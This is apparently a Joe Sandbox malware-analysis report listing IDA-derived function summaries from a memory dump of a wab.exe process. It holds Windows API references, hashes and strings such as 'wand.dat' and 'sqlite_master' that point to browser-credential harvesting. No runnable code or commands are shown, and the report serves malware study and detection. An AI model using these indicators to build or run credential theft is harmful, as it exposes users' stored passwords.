                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                              • wcslen.MSVCRT ref: 00410C74
                                                              • _wtoi.MSVCRT ref: 00410C80
                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                              • memcpy.MSVCRT ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 3023356884-0
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 3023356884-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 1171893557-0
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              APIs
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                              • wcscat.MSVCRT ref: 0041101F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                              • String ID:
                                                              • API String ID: 4284152360-0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID:
                                                              • API String ID: 3888421826-0
                                                              APIs
                                                              • memset.MSVCRT ref: 00417B7B
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$??3@malloc
                                                              • String ID:
                                                              • API String ID: 4284152360-0
                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              APIs
                                                              • memset.MSVCRT ref: 00402FD7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                              • strlen.MSVCRT ref: 00403006
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              APIs
                                                              • memcpy.MSVCRT ref: 004134E0
                                                              • memcpy.MSVCRT ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: d=E
                                                              • API String ID: 909852535-3703654223
                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                              • memcpy.MSVCRT ref: 0040C024
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 3988819677-2008345750
                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: F^@
                                                              • API String ID: 568519121-3652327722
                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                              APIs
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
